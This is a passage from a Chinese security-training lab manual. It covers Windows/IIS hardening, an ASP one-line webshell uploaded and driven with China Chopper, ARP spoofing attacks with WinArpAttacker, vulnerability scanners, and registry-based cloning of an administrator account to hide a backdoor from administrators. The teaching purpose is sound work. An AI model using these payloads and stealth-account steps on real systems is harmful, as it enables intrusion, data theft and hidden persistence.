将审核策略、审核登录事件、审核对象、审核过程跟踪、审核目录服务访问、审核特权使用、审核系统事件、审核账户登录事件、审核账户管理设置为审计。以“审核策略更改”为例。右击“审核策略更改”,点击属性,勾选成功,点击确定。如下图所示
更改所有选项过后如下图所示。
将审核策略、审核登录事件、审核对象、审核过程跟踪、审核目录服务访问、审核特权使用、审核系统事件、审核账户登录事件、审核账户管理设置为审计。以“审核策略更改”为例。右击“审核策略更改”,点击属性,勾选成功,点击确定。如下图所示。更改所有选项过后如下图所示。9、用户权限分配。单击“本地策略”→“用户权限分配”→“通过终端服务拒绝登陆”,右键单击“通过终端服务器拒绝登陆”,单击属性。默认已经加入“ASPNET”。如下图所示。
选中“ASPNET”点击删除,此时将ASPNET组从允许远程登录的组中删除。然后点击“添加用户或组”。如下图所示。
点击“高级”,然后点击“立即查找”,搜索结果中显示做所有的用户和组。如下图所示。
11、修改注册表以禁止IPC空连接。Hacker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的。因此需要禁止IPC空连接。在注册表管理界面,点击“HKEY_LOCAL_MACHINE”→“SYSTEM”→“CurrentControlSet”→“Control”→“LSA”,选择“RestrictAnonymous”。如下图所示。”
12、点击“开始”→“运行”,输入“cmd”以打开命令行。依次输入命令“net share c$ /del”、“net share admin$ /del”以删除服务器共享。如下图所示。
删除必须之外的任何没有用到的映射(保留asp、aspx、html、htm等必要映射即可)。14、右键单击“网站”“网站”→“默认网站”→“右键属性”→“自定义错误”,查看404错误页面的位置。在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件。如下图所示。
点击编辑,可在服务器任意地方写一htm文件,设置错误页面。如下图所示。
15、使用IIS 6.0,可以将应用程序隔离到应用程序池。应用程序池是包含一个或多个URL的一个组,一个工作进程或者一组工作进程对应用程序池提供服务。因为每个应用程序都独立于其他应用程序运行,因此,使用应用程序池可以提高Web服务器的可靠性和安全性。在Windows
操作系统上运行进程的每个应用程序都有一个进程标识,以确定此进程如何访问系统资源。每个应用程序池也有一个进程标识,此标识是一个以应用程序需要的最低权限运行的帐户。可以使用此进程标识来允许匿名访问您的网站或应用程序。双击“Internet信息服务(IIS)管理器”。右键单击“应用程序池”→“新建”→“应用程序池”。如下图所示。
操作系统上运行进程的每个应用程序都有一个进程标识,以确定此进程如何访问系统资源。每个应用程序池也有一个进程标识,此标识是一个以应用程序需要的最低权限运行的帐户。可以使用此进程标识来允许匿名访问您的网站或应用程序。双击“Internet信息服务(IIS)管理器”。右键单击“应用程序池”→“新建”→“应用程序池”。如下图所示。在“应用程序池”框中,为应用程序池键入一个新ID如“testAppPool”。在“应用程序池设置”下,勾选“使用新应用程序池的默认设置”,然后单击“确定”。如下图所示。
右键单击您想要分配到应用程序池的网站或应用程序,此处以“默认网站”为例,单击“属性”。根据您选择的应用程序类型,单击“主目录”。单击“应用程序池”,单击您想要分配网站或应用程序的应用程序池的名称,然后单击“确定”。如下图所示。
3、分析和思考
1.简要介绍一下“陷阱用户”。
2.设置屏幕保护密码的目的是什么。
实验16、一句话木马测试分析
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=一句话木马测试分析.rar&type=attach
实验目标
- 熟悉一句话木马的原理,掌握一句话木马的使用以及防御方法。
预备知识
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request(“value”)%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了。)这就被称为一句话木马,它是基于B/S结构的。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
2、点击“开始”→“管理工具”→“Internet信息服务(IIS)管理器”,点击“网站”,启动名叫“Article”的网站(点击右键可选启动)。如下图所示。
3、本实验网站的地址是“http://192.168.41.208:8016/”。其中“192.168.41.208”为虚拟机IP地址,“8016”为端口号。因此在本实验中后续所有“http://虚拟机IP地址:端口号/”均为http://192.168.41.208:8016。学员在浏览器中输入网站地址时输入http://192.168.41.208:8016后面再加上目录名和文件名。比如http://192.168.41.208:8016/upl oad/pic/anheng.asp,其中upload/pic为目录名,anheng.asp为文件名。4、打开浏览器,输入网址“http://虚拟机IP地址:端口号/admin.asp”登录网站后台管理。打开如下图所示页面。
5、使用用户名“admin”和密码“admin”登录后台(此实验为一句话木马测试实验,因此默认已获取后台密码,一般情况下,网站后台密码可通过啊D注入工具等获取)。如下图所示。
6、成功登录后台后,可以看到左边有一个文件上传菜单,点击它。如下图所示。
6、接下来我们可以在路径“C:\tools\AHCJ168\”下创建一个包含一个一句话木马的asp文件。内容为“<%evalrequest(“123”)%>”(不包括引号),其中小括号里的123是连接一句话木马工具的密码,密码也可以自行设置。如下图所示。
7、回到网站后台页面,在文件上传页面点击“浏览”,选择刚才新建的“anheng.asp”文件。如下图所示。
8、点击打开后,进行上传,标题填写为“Anheng”,并点击提交按钮。如下图所示。
9、提交完成后,就可以看到文件“anheng.asp”的保存路径了。如下图所示。
10、打开IE浏览器,访问步骤3的第二个地址http://虚拟机IP地址:端口号/upload/pic/anheng.asp。页面如下图所示。
11、此处页面显示空白,说明木马文件上传成功并可以执行。进入工具目录“C:\tools\AHCJ168”,打开中国菜刀运行程序“chopper.exe”进行连接。如下图所示
12、默认情况下,中国菜刀自身会有几个示例。右击工具空白处,选择“添加”。如下图所示。
16、我们可以进入网站根目录“Ariticle”以编辑任何文件,右击要编辑的文件。如下图所示。。
17、会打开一个新的编辑框,编辑完后点击上方的保存按钮即可。如下图所示。
18、另外还可以进行文件的上传和下载工作,比如我们可以将测试网站“Article”的数据库下载下来。右击article.mdb,选择下载文件。如下图所示。
19、接下来选择要保存article.mdb的路径,保存到目录“C:\tools\AHCJ168”,然后点击保存。如下图所示。
20、另外通过中国菜刀还可以看到其他盘符的内容。如下图所示。
21、关于此类攻击手段的防护措施:
①禁止上传脚本文件,并对上传文件夹的目录的执行脚本禁止掉。
②网站开发人员对get和post提交的内容中的execute,eval等内容进行过滤。
22、实验完成。
3、分析和思考
1.一句话木马的概念是什么,举例说明?
实验17、ARP欺骗攻击防御
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=ARP欺骗攻击防御.rar&type=attach
实验目标
- 了解arp的工作原理,对arp攻击做出相应的防御。
预备知识
从影响网络连接通畅的方式来看,arp欺骗分为二种,一种是对路由器arp表的欺骗;另一种是对内网pc的网关欺骗。
第一种arp欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网mac地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的mac地址,造成正常pc无法收到信息。
第二种arp欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的pc向假网关发数据,而不是通过正常的路由器途径上网。在pc看来,就是上不了网了,“网络掉线了”。
arp协议概述
ip数据包常通过以太网发送。以太网设备并不识别32位ip地址,它们是以48位以太网地址传输以太网数据包的。因此,ip驱动器必须把ip目的地址转换成以太网网目的地址。在这两种地址之间存在着某种静态的或算法的映射,常常需要查看一张表。地址解析协议(address resolution protocol,arp)就是用来确定这些映射的协议。
arp工作时,送出一个含有所希望的ip地址的以太网广播数据包。目的地主机,或另一个代表该主机的系统,以一个含有ip和以太网地址对的数据包作为应答。发送者将这个地址对高速缓存起来,以节约不必要的arp通信。
如果有一个不被信任的节点对本地网络具有写访问许可权,那么也会有某种风险。这样一台机器可以发布虚假的arp报文并将所有通信都转向它自己,然后 它就可以扮演某些机器,或者顺便对数据流进行简单的修改。arp机制常常是自动起作用的。在特别安全的网络上,arp映射可以用固件,并且具有自动抑制协议达到防止干扰的目的。
这是一个用作ip到以太网地址转换的arp报文的例子。在图中每一行为32位,也就是4个八位组表示,在以后的图中,我们也将遵循这一方式。
硬件类型字段指明了发送方想知道的硬件接口类型,以太网的值为1。协议类型字段指明了发送方提供的高层协议类型,ip为0806(16进制)。硬件 地址长度和协议长度指明了硬件地址和高层协议地址的长度,这样arp报文就可以在任意硬件和任意协议的网络中使用。操作字段用来表示这个报文的目 的,arp请求为1,arp响应为2,rarp请求为3,rarp响应为4。
当发出arp请求时,发送方填好发送方首部和发送方ip地址,还要填写目标ip地址。当目标机器收到这个arp广播包时,就会在响应报文中填上自己的48位主机地址。
2、实验步骤
一、实验准备1、登录win xp (攻击机)和win server 2003 (靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以Windows Server 2003为例。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
2、先确认win xp中已经安装好WinPcap,如下图所示。
3、再确认winxp中已经有WinArpAttack(即,arp攻击器v3.0升级版),如下图所示。
如果在win xp桌面上找不到WinArpAttack的快捷方式和,请按如下图所示目录直接打开即可。
2、选择目标主机(这里我们选择win server 2003,其IP地址为192.168.41.207),发起攻击。这里选择对其发起IP地址冲突攻击,如下图所示。
3、接下来,启动win server 2003中的“ARP防火墙单机版”,如下图所示。
4、接着在win xp中使用winArpAttacker对目标主机(192.168.41.207)发起Flood(泛洪)攻击,如下图所示
5、此时,回到win server 2003中的“ARP防火墙单机版”,可以看到其已经拦截到攻击方对其发起的ARP攻击,如下图所示。
3、分析和思考
1.简要介绍一下arp防御的两种方式。
2.分析一个以太网上的arp报文。
实验18、局域网ARP攻击
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=局域网ARP攻击.rar&type=attach
实验目标
- 了解arp的工作原理,能够使用arp攻击器对局域网主机进行arp攻击。
预备知识
我们知道,当我们在浏览器里面输入网址时,dns服务器会自动把它解析为IP地址,浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址(即mac地址)的呢?在局域网中,这是通过arp协议来完成的。arp协议对网络安全具有重要的意义。通过伪造IP地址和mac地址实现arp欺骗,能够在网络中产生大量的arp通信量使网络阻塞。所以网管们应深入理解arp协议。
arp协议是“address resolution protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的mac地址的。在以太网中,一个主机和另一个主机进行直接通信,必须要知道目标主机的mac地址。但这个目标mac地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标mac地址的过程。arp协议的基本功能就是通过目标设备的IP地址,查询目标设备的mac地址,以保证通信的顺利进行。
rarp:反向地址转换协议(reverse address resolution protocol)(rarp)允许局域网的物理机器从网关服务器的 arp表或者缓存上请求其 IP 地址。网络管理员在局域网网关路由器里创建一个表以映射物理地址(mac)和与其对应的 IP 地址。当设置一台新的机器时,其 rarp 客户机程序需要向路由器上的 rarp 服务器请求相应的 IP 地址。假设在路由表中已经设置了一个记录,rarp 服务器将会返回 IP 地址给机器,此机器就会存储起来以便日后使用。
我们以主机a(192.168.1.5)向主机b(192.168.1.1)发送数据为例。当发送数据时,主机a会在自己的arp缓存表中寻找是否有目标IP地址。如果找到了,也就知道了目标mac地址,直接把目标mac地址写入帧里面发送就可以了;如果在arp缓存表中没有找到相对应的IP地址,主机a就会在网络上发送一个广播,目标mac地址是“ff.ff.ff.ff.ff.ff”,这表示向同一网段内的所有主机发出这样的询问:“192.168.1.1的mac地址是什么?”网络上其他主机并不响应arp询问,只有主机b接收到这个帧时,才向主机a做出这样的回应:“192.168.1.1的mac地址是00-aa-00-62-c6-09”。这样,主机a就知道了主机b的mac地址,它就可以向主机b发送信息了。同时它还更新了自己的arp缓存表,下次再向主机b发送信息时,直接从arp缓存表里查找就可以了。arp缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除,这样可以大大减少arp缓存表的长度,加快查询速度。
arp攻击就是通过伪造IP地址和mac地址实现arp欺骗,能够在网络中产生大量的arp通信量使网络阻塞,攻击者只要持续不断的发出伪造的arp响应包就能更改目标主机arp缓存中的ip-mac条目,造成网络中断或中间人攻击。
arp攻击主要是存在于局域网网络中,局域网中若有一个人感染arp木马,则感染该arp木马的系统将会试图通过“arp欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
从影响网络连接通畅的方式来看,arp欺骗分为二种,一种是对路由器arp表的欺骗;另一种是对内网pc的网关欺骗。
第一种arp欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网mac地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的mac地址,造成正常pc无法收到信息。
第二种arp欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的pc向假网关发数据,而不是通过正常的路由器途径上网。在pc看来,就是上不了网了,“网络掉线了”。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示
远程登录,如下图所示。
2、Arp的攻击器v3.0升级版需要winpcap的支持,本机已安装好winpcap。
3、打开工具目录“C:\tools\AHCJ179”,双击攻击器v3.0升级版,双击winarpattacker.exe“winarpattacker.exe”。如下图所示。
4、双击运行winarpattacker.exe,打开“scan”->“scan lan”即可扫描到本局域网内的所有活动主机。如下图所示。
5、选中本机IP地址(此例中为192.168.41.208)如下图所示。
6、点击“Attack”→“IP Conflict”对该主机进行IP占用。如下图所示。
winarpattacker通过伪造此IP的数据包进行路由器arp表欺骗,这样,此IP的主机数据包达不到网关,使其不能连接网络。
7、网关欺骗。选择“attack”->“bangateway”进行网关欺骗。如下图所示。
3、分析和思考
1.从影响网络连接通畅的方式来简要介绍一下arp欺骗的两种方式。
2.arp和rarp协议的区别是什么。
实验19、Shadow database scanner扫描数据库
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=Shadow database scanner扫描数据库.rar&type=attach
实验目标
- 使用Shadow database scanner扫描数据库
预备知识
shadow database scanner是来自俄罗斯的老牌安全扫描软件。这是一款非常专业的安全漏洞扫描软件,能扫描数据库各种漏洞,它提供了漏洞管理、数据库管理和分析功能,为使用互联网的组织提供了一个针对数据库安全的灵活易用的解决方案。其功能非常强大,是数据库人员必备软件之一。shadow database scanner是商业软件,本实验使用shadow database scanner的试用版本进行介绍。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
2、打开工具目录“C:\tools\AHCJ181\SDS”。如下图所示。
3、双击“sds.exe”以打开安装软件,进入安装向导界面,点击“Next”。如下图所示。
4、进 入 安 装 路 径 选 择 界 面。点 击 “browse”, 将安 装 目 录设置为“C:\tools\AHCJ181\ShadowDatabaseScanner”。点击“Next”。如下图所示。
5、快捷方式默认是创建在开始菜单中的,我们可以根据需要选择在哪里创建,这里按照默认设置,选择好后点击“next”按钮打开准备安装的界面。如下图所示.
6、点击“install”按钮开始安装,稍等片刻就可以安装完成。如下图所示。
7、默认选中“run shadow database scanner”这一项表示安装完成后运行shadow database scanner,我们点击“finish”按钮会打开shadow database scanner,因为使用的是试用版本,所以打开时会出现提示信息,试用版只能使用15天。如下图所示。
8、点击“continue”按钮继续,打开shadow database scanner界面。如下图所示。
9、shadow database scanner使用说明:shadow database scanner的界面可以分为四部分。下面对各部分分别进行介绍:第一部分:菜单栏,这里是shadow database scanner的菜单选项,各菜单如下:file:文件菜单,主要用于新建、打开、保存、另存为、关闭会话等view:视图菜单,这里主要是用于显示或关闭界面中的各部分,如工具栏,状态栏及是否显示详细工具按钮信息等。action:动作菜单,主要是扫描时的相关动作,如开始、暂停、结束扫描,添加、移除主机等。tools:工具菜单,是shadow database scanner中比较重要的一个菜单,主要用到的有:①options:选项,用于设置安全扫描的选项。如下图所示。
(a)general选项用于设置扫描的速度,可以通过调整线程数、模块数、总线程数、ping的超时时间和数据的超时时间改度扫描速度。
(b)scanner选项用于设置扫描的参数,如设置添加IP后自动开始扫描、扫描完成后删除空的主机。
(c)scheduler选项用于设置定时扫描的任务。如下图所示
14、注意,刚才在更改规则时,我们更改了它的描述信息。现在选择刚添加上的规则,然后点
这里我们选择html类型,然后点击“generate”按钮生成报告会弹出保存对话框,选择好位置保存。因为本实验使用的是试用版本,生成报告功能无法使用,故在此不多做介绍。
22、实验完成。
3、分析和思考
1.Shadow database scanner的主要功能是什么。
2.简要介绍一下选择扫描时针对的各个端口。
实验20、局域网流量管理工具(p2p终结者)
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=局域网流量管理工具(p2p终结者).rar&type=attach
实验目标
- 学习局域网流量管理工具p2p终结者的使用
预备知识
p2p终结者是国内目前首套专门针对网络p2p滥用问题开发系统软件,软件可以实现对局域网全网主机的p2p下载,只需要一机安装,就可以控制全网,非常易于部署,可保证企业网络有限带宽的正当利用。控制全网p2p应用,可帮助企业轻松解决网络p2p滥用这个日益严重的问题,软件安装都很简单,是解决p2p问题的最佳选择。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
3、打开工具目录“C:\tools\AHCJ183\”。如下图所示。
4、打开目录p2pover,双击“p2pover.exe”安装软件。进入安装向导界面。点击“下一步”。如下图所示。(聚生网管需要有winpacp的支持,此计算机已经安装过了,如果没有安装,需要安装winpacp软件)
5、进入许可证协议界面,点击“我接受”。如下图所示。
6、进入安装路径选择界面,将安装路径设置为“C:\tools\AHCJ183\p2pover\p2pover”,点击“安装”。如下图所示。
7、安装完成。点击“下一步”。如下图所示。
8、安装完成P2P终结者后,在开始菜单中找到p2p终结者的启动程序启动软件并打开。如下图所示。
3、分析和思考
1.p2p的概念是什么。
实验21、利用retina探测系统安全弱点
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=利用retina探测系统安全弱点.rar&type=attach
实验目标
- 利用retina探测系统安全弱点
预备知识
Retina网络安全漏洞扫描器是一款卓越的扫描解决方案,可以在多种平台上使用,可以自动修复漏洞,并能够创建自己的审计工作。由于漏洞审计的不断增加,漏洞数据库会不断的更新。
Retina网络安全扫描器会识别应用程序的漏洞以及网站所暴露的风险,按优先级对威胁进行排序,并生成图形化的、直观的html报告,根据漏洞即威胁等级指明网络安全状态。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
3、双击桌面的RetinaNetworkSecurityScanner图标,运行Retina软件,如图所示。
4、打开“retina”后,出现程序界面。如下图所示。
最上方为菜单栏,下面为retina的主体,主要包含下面5部分:第1部分:针对单个ip或连续ip地址范围的扫描,分为完全扫描和只对漏洞列表的前20项进行的扫描。
第2部分:retina的主要部分,分为四项:discover、audit、remediate、report。discover:针对地点确定的设备,如工作站、路由器等,可以是单个或多个ip地址。audit:打开retina时默认选项,用于扫描任何一个具有ip地址的设备,结果会返回一个漏洞和补丁的列表。remediate:生成一个脆弱性信息和建议方案的列表来帮助修复漏洞。report:提供漏洞和补丁的确切情况报告和详细的总结报告。
第3部分:与第2部分中的当前选项卡对应,显示在该选项卡下可执行的相关操作。第4部分:其它选项,用于显示除第2部分中所选中的选项卡外的其它选项。
第5部分:帮助和支持。
5、快速扫描选项将使用第1部分进行扫描,默认为“CompleteScan”。点击“start”按钮进行完全扫描。retina将会扫描目标主机非常详细的信息,包括漏洞信息(按照严重性会用不同的颜色显示),所开放的服务信息(rpc、ftp、ip等),主机的信息(操作系统类型、主机mac地址、所开放的tcp、udp端口等,开放的共享等)等,在最下方的状态中会显示扫描过程中的相关信息。如下图所示。
第5部分:帮助和支持。5、快速扫描选项将使用第1部分进行扫描,默认为“CompleteScan”。点击“start”按钮进行完全扫描。retina将会扫描目标主机非常详细的信息,包括漏洞信息(按照严重性会用不同的颜色显示),所开放的服务信息(rpc、ftp、ip等),主机的信息(操作系统类型、主机mac地址、所开放的tcp、udp端口等,开放的共享等)等,在最下方的状态中会显示扫描过程中的相关信息。如下图所示。6、使用“fbi-sanstop20”只对漏洞列表的前20项进行的扫描。与“CompleteScan”相比这次显示的漏洞数目明显减少。如下图所示(图左为“CompleteScan”,图右为“fbi-sanstop20”)
7、打开discover选项卡。Discover选项卡下,Actions用于设置扫描的动作,Result显示扫描结果,在Result右边可以将扫描结果输出到文件。如下图所示。
(1)Actions部分:
①Targets:设置扫描的目标,在Targettype栏下设置目标的类型。如下图所示。
SingleIP:单个ip地址,针对一个单独的目标。IPRange:指定ip范围,from指定开始ip地址,to指定结束ip地址。CIDRNotation:指定cidr类型,如192.168.41.0/24表示192.168.41.255这个网络内的所有主机。Namedhost:对某一个域名进行检测,在name下面输入域名即可。Addressgroup(s):指定目标为一个或多个地址范围,默认为4个范围。如下图所示。
可以点击“modify”按钮增加或删除地址范围。如下图所示。
可以点击“modify”按钮增加或删除地址范围。如下图所示。点击“new”按钮在弹出的对话框中输入名字即可新建一个地址组,按“delete”按钮删除当前的地址组。可以对地址组内的地址进行更改,添加要先确定好ip地址,从singleip、iprange、cidrnotation、namedhost中选定一种然后设定好ip,点下面的“add”按钮。要删除地址组内的ip地址要先选中address框内的ip然后点下面的“delete”按钮。
如果想禁用特定的目标类型,可以选中“omitthisentry”,这样的话在扫描时会跳过此ip。import用于从文件中读取主机文件。addresses:用于指定多个不连续的ip地址,在下面的输入框中输入ip即可。
②options:设置扫描的相关选项。如下图所示。
icmpdiscovery:确定tcmp协议
tcpdiscoveryonport:确定tcp数据包,可以自己输入端口号,各端口号之间用逗号分隔
udpdiscovery:确定udp协议
performosdetection:确定操作系统类型
getreversedns:扫描反向域名系统(rdns)和检索以域名为目标的ip地址
getnetbiosname:扫描netbios名字
getmacaddress:扫描mac地址
③discover:点击此按钮开始进行扫描。下图所示。
④schedule:设置预定时间开始一个扫描。如下图所示。
Name:给这个扫描任务指定一个名字。
Start:设置开始扫描的时间,retina对中文的支持不是很好,所以会出现乱码。
Abort the scan if it runs longer than…:设置如果运行时间从预定的时间开始超过多少分钟就终止扫描。
Frequency:设置扫描频率,可以是仅一次、每天、每周、每月等。注意:其它选项卡中也会有此选项,它们的用法都是一样的,介绍其它选项卡时不再介绍此项。
(2)results部分扫描完成后结果将会在此部分显示,结果包括ip地址、主机名、dns名字、操作系统类型、mac地址、发现的时间。
(3)扫描报告部分这部分设置扫描报告的类型,分为export和report,选择export则输出xml格式的文件,选择report则输出html格式的文件,选择后点击“gnerate”选择保存位置即可。
8、audit选项卡。扫描任何一个具有ip地址的设备并返回一个漏洞和补丁信息的列表。如下图所示。
①Action部分:
Targets:设置扫描的目标主机,同discovery中部分。右边有一人输出选项,可以将扫描的结果指定文件,filename指定文件名,jobname:指定此扫描的名字。
Ports:设置端口组。选择扫描的端口范围,可以增加或删除,设置方法同地址组的设置方法相似。如下图所示。
设置完成后,选择scan按钮就可以开始扫描了。Scheduled用于设置定时扫描。
②Scanjobs
Active:正在扫描的任务会在这里出现。
Completed:扫描任务完成后会在这里出现,点击任务名字,下方会出现相应的扫描结果
Scheduled:显示定时扫描的任务。
Rescan:重新进行扫描
Delect:删除所选项Refresh:刷新
③Scannedips显示所选的任务是针对哪一个ip地址操作的。
9、Remediate选项卡。点击“Generate”以生成报告。如下图所示。
(1)configuration部分,用于此选项的配置
Filter:筛选选项
Groupreportby:指定扫描结果的报告中以哪一项进行分组,mathine为知己的信息,vulnerability为漏洞信息,cve(通用漏洞披露示)为从cve中查找到漏洞,用于帮助修补漏洞。
Sort machineby:选择可使用ip地址还是主机名进行分类
Sort vulnerabiliesby:指定使用名字好事危险进行分类
Option:输出的相关的选项,一般使用默认的就可以。
Generate:都配置好点击此按钮生成报告,结果会在下方的result部分显示
(2)scanjobs部分
此选项的设置与audit的设置相同。
(3)results部分点击generate后生成的报告会在此显示。
在results右边有两个小按钮,分别有用网页形式显示报告和使用word形式显示报告,点击后会打开相应的报告。
10、Report选项卡
(1)configuration部分Type:设置报告的类型
(2)scanjobs部分在此部分中需在产生报告的项目,一般在已完成(completed)中。
11、results部分最后报告会在这里显示,右边的两个按钮同remediate选项卡一样。
12、其他部分:左边“reporttasks”部分与右边部分是相对应的。“otherplaces”的前三项也是与右边的对应。第四项“option”是对retina进行相关的设置的。如下图所示。
13、retina设置实例打开audit选项卡进行设置,使用target选项卡设置目标主机。如下图所示。
14、打开port,进行端口设置。如下图所示。
15、在这里选择“CommonPorts”以只对常用端口进行扫描。点击“Ports”下面的“Audits”选项卡设置漏洞检测。如下图所示。
16、点击“Audits”下面的“options”选项卡,选择默认设置。如下图所示。
17、点击“options”下面的“credentials”选项卡,使用匿名方式扫描,选择“nullsession”。如下图所示。
18、设置完成后,点击“scan”按钮,在弹出的警告框中点击“Yes”按钮开始扫描。扫描时会在左下角显示正在进行操作,稍等片刻就会完成。如下图所示。
19、点击上方的“Report”选项卡,设置输出报告。如下图所示。
设置type类型:
点击“Generate”按钮,会生成扫描结果的报告,在下方的Results窗口中,通过右侧的滑块可以查看相关的内容,如下图所示。
20、实验完成,关闭所有窗口和虚拟机。
3、分析和思考
1.Retina网络安全漏洞扫描器的主要功能是什么。
实验22、CA和CCA的使用
1、实验介绍
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
实验目标
- 使用ca克隆帐号,使用cca查看帐号是否被克隆。
预备知识
- 简单克隆:
原理:只复制“f”值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方 便些。如果肉鸡的管理员不是太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就 是说你在系统里的文件“c:documents and settingsadministrator”和admin是一样的。而非以前的“c:documents and settingsguest”。但是在“query user”和“终端服务管理器”里面你所登陆的用户还是“guest”,还有就是用命令“net localgroup administrators”还是可以看出guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出 guest用户有什么问题。
具体方法:无论你用什么方法,用 “system”权限打开“注册表”,也可用 psu 命令格式为 psu -p regedit -pid 这里解释一下,后面的pid是系统进程winlogon的值.然后打开[hkey_local_machinesamsamdomains accountusers000001f4]打开他的“f”值,然后复制到 “1f5”的“f”值里面。然后在cmd下(必须),给guest改密码(net user guest password)然后**guest帐户(net user guest /active:y),然后我们把他禁用 (net user guest /active:n )简单!
- 完全克隆:
原理:全部复制“f”和“v”值。这样方法克隆出来的2个帐户其实在系统里 是一个帐户,这样隐蔽性最高,除非用专业工具查看,否则在 net 和用户管理中,还有“net localgroup administrators”都看不出有什么问题来。还有最重要的一点,如果你登陆上去后,在“query user”和“终端服务管理器”里面你所登陆的用户上面显示的是“administrator”,)这样我们就达到了超级隐蔽的目的。在这里我 要说明的一点就是,如果你用这个克隆方法弄出来的帐户登陆的话,其实你登陆的是administrator的界面。也就是说,假设你使用克隆帐户通过 3389登陆,在你断开连接没有注销的时候,如果administrator也使用3389登陆,那他登陆的将是你的会话!!你那个会话上所保留的操作 对方也是可以看见的,因为你们2个现在在同一个会话中!而我所说的不方便就是指的这点。但是如果3389是你开的,而管理员不会通过远程登陆服务器,那你们的会话就不是一个。还有如果你用简单克隆的方法克隆下来的帐户登陆,那你们登陆的不是一个会话,帐户还是不同的2个帐户,可以放心。
2、实验步骤
